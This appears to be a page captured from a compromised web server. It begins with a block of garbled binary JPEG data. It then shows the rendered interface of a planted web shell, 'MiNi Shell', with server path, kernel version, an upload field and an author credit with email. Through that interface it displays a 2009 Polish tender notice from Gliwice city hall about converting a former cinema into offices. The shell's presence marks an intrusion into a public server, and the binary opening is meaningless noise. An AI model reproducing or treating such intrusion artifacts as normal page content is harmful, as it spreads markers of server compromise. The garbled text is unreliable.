JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090313/50161-N-2009.html

<p class="kh_header"><b>Gliwice: Dostosowanie sali byłego kina i pomieszczeń związanych dla potrzeb biurowych Urzędu Miejskiego</b><br>
<b>Numer ogłoszenia: 50161 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Gliwicach, Wydział Organizacyjny , ul. Zwycięstwa 21, 44-100 Gliwice, woj. śląskie, tel. +48 032 2385466, faks +48 032 2385467.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostosowanie sali byłego kina i pomieszczeń związanych dla potrzeb biurowych Urzędu Miejskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem robót budowlanych jest: 
 Zaprojektowanie i wykonanie robót remontowo - adaptacyjnych mających na celu dostosowanie dawnej sali kinowej oraz przyległych powierzchni użytkowych na parterze i pierwszym piętrze budynku Urzędu Miejskiego dla potrzeb biurowych Urzędu, na które składa się:
a) Adaptacja sali kinowej i przyległego pomieszczenia operatora na pomieszczenia biurowe - 7 sal dla potrzeb Wydziału PU wg propozycji jak na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego), w tym wymiana drzwi głównych, wejściowych do sali kinowej, w formie lekkiej konstrukcji stalowej przeszklonej z zastosowaniem kolorystyki i technologii jak w sali operacyjnej Wydziału SO.
b) Adaptacja pomieszczenia przyległego do pomieszczenia operatora kina na zaplecze dla konserwatorów (Wydział OR) jak na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego).
c) Adaptacja pomieszczeń rozdzielni elektrycznej kina, WC oraz zaplecza garażu na pomieszczenie biurowe dla Wydziału PU, jak na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego), z zapewnieniem zasilania energetycznego z rozdzielni głównej w piwnicy dla potrzeb adaptowanych pomieszczeń jak w pkt. a), b), c), osobno dla sieci komputerowej i dla pozostałych urządzeń.
d) Adaptacja pomieszczeń kasy kina, na powierzchnię użytkową biura obsługi interesantów, jak na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego).
e) Wykucie otworu i zabudowa typowych drzwi w pomieszczeniu ochrony, a także zabudowa ścianki działowej na korytarzu pomiędzy pomieszczeniami rozdzielni kina i WC, a pomieszczeniem operatora kina, wraz z drzwiami, jak na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego), w technologii lekkiej konstrukcji stalowej przeszklonej z zastosowaniem kolorystyki i technologii jak w sali operacyjnej Wydziału SO.
f) Adaptacja części hallu wejściowego w rejonie kina na potrzeby biurowe Działu Najmu Lokali jak na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego), w formie ścianek działowych wykonanych w technologii lekkiej konstrukcji stalowej przeszklonej z zastosowaniem kolorystyki i technologii jak w sali operacyjnej Wydziału SO. 
g) Wymiana drzwi wejściowych zewnętrznych oraz wewnętrznych w rejonie kina, jak na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego), odpowiednio zgodnie z technologią i kolorystyką jak drzwi wejściowe główne od strony ul. Zwycięstwa, oraz w technologii lekkiej konstrukcji stalowej przeszklonej z zastosowaniem kolorystyki i technologii jak w sali operacyjnej wydziału SO.
h) Wydzielenie strefy pod nazwą sala operacyjna USC poprzez zabudowę w miejscu wskazanym na załączonym planie (załącznik nr 1 do programu funkcjonalno - użytkowego) lekkiej konstrukcji stalowej przeszklonej z dwuskrzydłowymi drzwiami wejściowymi wraz z demontażem istniejącej rolety z zastosowaniem kolorystyki i technologii jak w sali operacyjnej Wydziału SO.
i) Wydzielenie strefy przeciwpożarowej w rejonie sali konferencyjnej nr 123 na pierwszym piętrze poprzez zabudowę w miejscach wskazanych na załączonym planie (załącznik nr 2 do programu funkcjonalno - użytkowego) lekkich konstrukcji stalowych przeszklonych z dwuskrzydłowymi drzwiami wejściowymi z zastosowaniem kolorystyki i technologii jak w sali operacyjnej Wydziału SO.
j) Wyposażenie drzwi wejściowych do budynku, o których mowa w pkt 1.1.g) i do sali operacyjnej USC w zamki klasy C, lub równoważne.
 
1.2. Zadanie obejmuje:
a) sporządzenie koncepcji architektonicznej wraz z planem kosztów realizacji zadania, 
b) sporządzenie projektu budowlano - wykonawczego, w branżach:
-    budowlanej,
-    elektrycznej, w tym instalacji elektrycznej wraz z oświetleniem i zasilaniem      z głównej rozdzielni w pomieszczeniu piwnicy budynku.,
-    instalacji słaboprądowych (komputerowej, teletechnicznej, oświetlenia ewakuacyjnego),
-   ewentualnej instalacji c.o. dla wydzielonych pomieszczeń w których na skutek dokonanych nowych podziałów brak jest istniejących grzejników, a po sporządzeniu bilansu ciepła w świetle przypisanych im funkcji wystąpi potrzeba ich dodatkowego zamontowania. 
c)  opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych, 
d)  wykonanie robót na podstawie tych projektów (po ich uprzedniej akceptacji przez Zamawiającego),.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.22.00.06-6, 79.93.20.00-6, 45.40.00.00-1, 45.42.10.00-4, 45.43.21.30-4, 45.11.13.00-1, 45.31.00.00-3, 45.30.00.00-0, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Posiadanie uprawnien do wykonywania okreslonej działalnosci lub czynnosci, jezeli ustawy nakładaja
obowiazek posiadania takich uprawnien, oraz niepodleganie wykluczeniu z postepowania o udzielenie
zamówienia (podstawy prawne wykluczenia z postepowania okresla art. 24 ust. 1 i 2 ustawy pzp);
w przypadku podmiotów działajacych wspólnie warunek dotyczacy niepodlegania wykluczeniu, zgodnie z
art. 24 ust. 1 i 2 ustawy Pzp, o którym mowa powyzej, musza spełniac wszystkie podmioty działajace
wspólnie.
2) Posiadanie niezbednej wiedzy i doswiadczenia oraz dysponowanie potencjałem technicznym i osobami
zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiazania innych podmiotów do
udostepnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
o zamówienie moga ubiegac sie wykonawcy, którzy w okresie ostatnich pieciu lat przed dniem wszczecia
postepowania, a jezeli okres wykonywania działalnosci jest krótszy, w tym okresie, wykonali co najmniej
jedna robote budowlana polegajaca na wykonywaniu robót remontowo- budowlanych w obiektach
uzytecznosci publicznej, o wartosci co najmniej 150 000 zł brutto, oraz co najmniej 1 robote polegajaca na zabudowie scianek działowych w formie lekkich konstrukcji stalowych przeszklonych o wartosci nie
mniejszej niz 20 000 zł brutto.
o zamówienie moga ubiegac sie wykonawcy, którzy dysponuja co najmniej nastepujacymi osobami z
uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalnosci:
- konstrukcyjno-budowlanej - 1 osoba,
- elektrycznej - 1 osoba
legitymujacymi sie przynaleznoscia do odpowiedniej Okregowej Izby Inzynierów Budownictwa., w
przypadku podmiotów działajacych wspólnie osoby zdolne do wykonania zamówienia podlegaja
sumowaniu.
W przypadku podmiotów wystepujacych wspólnie wykazane doswiadczenie i wiedza poszczególnych
podmiotów podlega sumowaniu
3) Znajdowanie sie w sytuacji ekonomicznej i finansowej zapewniajacej wykonanie zamówienia;.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - oswiadczenie o spełnieniu warunków udziału w postepowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy
pzp) o tresci ZAŁACZNIKA NR 2 do SIWZ;
- aktualny odpis z własciwego rejestru albo aktualne zaswiadczenie o wpisie do ewidencji działalnosci
gospodarczej, jezeli odrebne przepisy wymagaja wpisu do rejestru lub zgłoszenia do ewidencji
działalnosci gospodarczej wystawiony nie wczesniej niz 6 miesiecy przed upływem terminu składania
ofert; w przypadku spółki cywilnej - aktualne zaswiadczenie o wpisie do ewidencji działalnosci
gospodarczej lub aktualny odpis z własciwego rejestru dla kazdego ze wspólników;
- wykaz osób i podmiotów, którymi dysponuje lub bedzie dysponował wykonawca i które beda
uczestniczyc w wykonywaniu zamówienia, wraz z informacjami potwierdzajacymi spełnienie warunku
udziału w postepowaniu o tresci ZAŁACZNIKA NR 6 do SIWZ oraz pisemne zobowiazania innych
podmiotów do udostepnienia osób zdolnych do wykonania zamówienia, jezeli w wykazie wykonawca
wskazał osoby, którymi bedzie dysponował;
- dokumenty stwierdzajace, ze osoby, które beda uczestniczyc w wykonywaniu zamówienia, posiadaja
wymagane uprawnienia;
- wykaz robót budowlanych wykonanych w okresie ostatnich pieciu lat przed dniem wszczecia niniejszego
postepowania, a jezeli okres prowadzenia działalnosci jest krótszy - w tym okresie, z podaniem ich
wartosci oraz daty i miejsca wykonania o tresci ZAŁACZNIKA NR 5 do SIWZ oraz załaczeniem
dokumentów potwierdzajacych, ze roboty te zostały wykonane nalezycie.
Dokumenty składane przez wykonawców majacych siedzibe lub miejsce zamieszkania poza terytorium
Rzeczypospolitej:
a) jezeli wykonawca ma siedzibe lub miejsce zamieszkania poza terytorium Rzeczypospolitej, zamiast:
- aktualnego odpisu z własciwego rejestru albo zaswiadczenia o wpisie do ewidencji działalnosci
gospodarczej,
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibe lub miejsce zamieszkania,
potwierdzajace odpowiednio, ze:
- nie otwarto jego likwidacji ani nie ogłoszono upadłosci, wystawione nie wczesniej niz 6 miesiecy przed
upływem terminu składania ofert,
b) jezeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibe lub miejsce
zamieszkania, nie wydaje sie dokumentów, o których mowa w podpunkcie a) składa dokument
zawierajacy oswiadczenie złozone przed notariuszem, własciwym organem sadowym, administracyjnym
albo organem samorzadu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub
kraju, w którym wykonawca ma siedzibe lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiajacego Gliwice, ul. Zwyciestwa 21, Biuro Obsługi Interesantów, stanowisko ds. zamówien publicznych (parter),.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2009 godzina 10:00, miejsce: siedziba zamawiajacego Gliwice, ul. Zwyciestwa 21 sala nr 136, piętro I.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com